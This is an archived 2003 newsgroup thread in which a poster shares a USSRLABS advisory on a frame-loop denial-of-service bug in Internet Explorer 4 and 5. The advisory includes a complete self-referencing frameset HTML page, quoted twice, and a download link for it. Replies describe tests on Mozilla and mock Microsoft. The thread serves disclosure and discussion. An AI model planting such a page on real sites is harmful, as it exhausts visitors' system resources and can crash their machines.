Go Back   Velocity Reviews > Newsgroups > Computer Security
User Name
Password
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

Reply

Computer Security - Yet Another IE Vulnerability??- Frame Looping

 
Thread Tools Search this Thread
Old 11-12-2003, 06:10 AM   #1
Default Yet Another IE Vulnerability??- Frame Looping



Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability


Microsoft Internet Explorer 4.x

Microsoft Internet Explorer 5.x
Frame Loop Vulnerability




PROBLEM:

It is possible to create a malicious webpage that when visited by an IE
user all of their system resources are devoured and depending on the
system its possible that the machine can even crash and reboot itself.

The reason you can use up all of the client's resources is by creating
an endless loop of frames.

You create a html file that has a few frames inside it and then link
those frames back to the same html file so every time IE loads the new
frame it loads another new frame and another etc...

Until after a short time your resources are all used up and your system
crashes.

We understand this is somewhat of a nuisance hole but still something
that needs to be addressed.

Example:

-----------readme.htm------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<head>
<title>Ussrlabs is getting hard</title>
</head>
<frameset framespacing="2" frameborder="no" rows="65,*">
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
<noframes>
<body bgcolor="#FFFFFF">
<p>This web page uses frames, but your browser doesn't support them.</p>
</body>
</noframes>
</frameset>
<frameset>
<noframes>
</noframes>
</frameset>
</html>
-----------readme.htm------------

Or if you want the html can be downloaded here.

http://www.ussrback.com/iehole/readme.zip

Note: It also affect Microsoft FrontPage.

Vendor Status:

Contacted.

"We talked to MS and they said this is a nuisance attack and do not
think its a security hole. So you will not be getting a patch for
this(maybe). However, it is good to know that Netscape Navigator is not
affected by this hole."

Vendor Url: http://www.microsoft.com/

Program Url: http://www.microsoft.com/windows/ie/default.htm

Credit:

USSRLABS

SOLUTION:

Nothing yet.




I made one of those pages (frame-loop-tester.html), placed it in my
webserver's /pub directory, and tested it against Mozilla (because I'm
not crazy enough to run IE) on my Linux box. It did try sucking up
system resources, and with top running in an x-term, the process tried
to use up about 92%, at which time Linux cut it. Nothing appeared on the
browser.



--
-=-=-=-=-=-=-=-=-=Atr2-WBS @ Atr2.Ath.Cx=-=-=-=-=-=-=-=-=-
[jayjwa] Mod_SSL / GPG / OpenSSL
"Save the 'Net, Unplug a Windows machine today!"

=-=-=Linux Tough.Powered By Slackware=-=HTTPS/FTP=-RLF#37=





jayjwa
  Reply With Quote
Old 11-12-2003, 07:38 AM   #2
Colonel Flagg
 
Posts: n/a
Default Re: Yet Another IE Vulnerability??- Frame Looping
In article <>,
says...
>
> Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability
>
>
> Microsoft Internet Explorer 4.x
>
> Microsoft Internet Explorer 5.x
> Frame Loop Vulnerability
>
>
>
>
> PROBLEM:
>
> It is possible to create a malicious webpage that when visited by an IE
> user all of their system resources are devoured and depending on the
> system its possible that the machine can even crash and reboot itself.
>
> The reason you can use up all of the client's resources is by creating
> an endless loop of frames.
>
> You create a html file that has a few frames inside it and then link
> those frames back to the same html file so every time IE loads the new
> frame it loads another new frame and another etc...
>
> Until after a short time your resources are all used up and your system
> crashes.
>
> We understand this is somewhat of a nuisance hole but still something
> that needs to be addressed.
>
> Example:
>
> -----------readme.htm------------
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
> <html>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
> <head>
> <title>Ussrlabs is getting hard</title>
> </head>
> <frameset framespacing="2" frameborder="no" rows="65,*">
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
> <noframes>
> <body bgcolor="#FFFFFF">
> <p>This web page uses frames, but your browser doesn't support them.</p>
> </body>
> </noframes>
> </frameset>
> <frameset>
> <noframes>
> </noframes>
> </frameset>
> </html>
> -----------readme.htm------------
>
> Or if you want the html can be downloaded here.
>
> http://www.ussrback.com/iehole/readme.zip
>
> Note: It also affect Microsoft FrontPage.
>
> Vendor Status:
>
> Contacted.
>
> "We talked to MS and they said this is a nuisance attack and do not
> think its a security hole. So you will not be getting a patch for
> this(maybe). However, it is good to know that Netscape Navigator is not
> affected by this hole."
>
> Vendor Url: http://www.microsoft.com/
>
> Program Url: http://www.microsoft.com/windows/ie/default.htm
>
> Credit:
>
> USSRLABS
>
> SOLUTION:
>
> Nothing yet.
>
>
>
>
> I made one of those pages (frame-loop-tester.html), placed it in my
> webserver's /pub directory, and tested it against Mozilla (because I'm
> not crazy enough to run IE) on my Linux box. It did try sucking up
> system resources, and with top running in an x-term, the process tried
> to use up about 92%, at which time Linux cut it. Nothing appeared on the
> browser.
>
>
>
>




thanks for another example of why IE should be ripped out of Windows and
replaced with something a little less dangerous, like Lynx

go ahead folks, keep running your Fat32 and NTFS as Admin... you're
doing nothing but propagating Microsoft's demise.




--
Colonel Flagg
http://www.internetwarzone.org/

Privacy at a click:
http://www.cotse.net

Q: How many Bill Gates does it take to change a lightbulb?
A: None, he just defines Darkness? as the new industry standard..."

"...I see stupid people."


Colonel Flagg
  Reply With Quote
Old 11-12-2003, 08:02 AM   #3
Thund3rstruck
 
Posts: n/a
Default Re: Yet Another IE Vulnerability??- Frame Looping
Colonel Flagg Spilled my beer when they jumped on the table and
proclaimed in <>:
> thanks for another example of why IE should be ripped out of Windows
> and replaced with something a little less dangerous, like Lynx
>
> go ahead folks, keep running your Fat32 and NTFS as Admin... you're
> doing nothing but propagating Microsoft's demise.


Running as Admin is the same as running in root. "If you play in
root you will eventually kill the whole tree" - forget his name but
he's in the c.o.l.s newsgroup... <G>

NOI


Thund3rstruck
  Reply With Quote
Old 11-12-2003, 03:26 PM   #4
n1pop@hotmail.com
 
Posts: n/a
Default Re: Yet Another IE Vulnerability??- Frame Looping
jayjwa <> wrote in message news:<>...
> I made one of those pages (frame-loop-tester.html), placed it in my
> webserver's /pub directory, and tested it against Mozilla (because I'm
> not crazy enough to run IE) on my Linux box. It did try sucking up
> system resources, and with top running in an x-term, the process tried
> to use up about 92%, at which time Linux cut it. Nothing appeared on the
> browser.


As a local file, Mozilla on XP Pro (work) loaded the page but stopped.
Didn't lock, didn't die, just finished at some point.


n1pop@hotmail.com
  Reply With Quote
Old 11-12-2003, 08:11 PM   #5
Beavis
 
Posts: n/a
Default Re: Yet Another IE Vulnerability??- Frame Looping
> PROBLEM:
>
> It is possible to create a malicious webpage that when visited by an IE
> user all of their system resources are devoured and depending on the
> system its possible that the machine can even crash and reboot itself.
>

Isn't this IE's default behavior?


Beavis
  Reply With Quote
Old 11-13-2003, 10:41 AM   #6
@micro$oft.com
 
Posts: n/a
Default Re: Yet Another IE Vulnerability??- Frame Looping
Beavis wrote:
>>PROBLEM:
>>
>>It is possible to create a malicious webpage that when visited by an IE
>>user all of their system resources are devoured and depending on the
>>system its possible that the machine can even crash and reboot itself.
>>

>
> Isn't this IE's default behavior?


I see lots of Mozilla's but no one tried it on IE yet?


-jayjwa





@micro$oft.com
  Reply With Quote
Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off

Similar Threads
Thread Thread Starter Forum Replies Last Post
Computer Security aldrich.chappel.com.use@gmail.com A+ Certification 0 11-27-2007 02:11 AM
DVD dead! Walter Traprock DVD Video 141 08-03-2006 03:47 AM
Experts/Polls: Toshiba's HD-DVD dead in the water. Blu-ray will win. asj DVD Video 569 05-11-2006 01:26 AM
Re: GOD=G_uv HOW TO MAKE AN INVISIBLE GOD MOVIE George Hammond DVD Video 16 10-12-2005 10:56 PM
Idle Hands DVD? widescreen or full frame? Mkebeliev DVD Video 2 07-18-2004 05:22 PM




SEO by vBSEO 3.3.2 ©2009, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46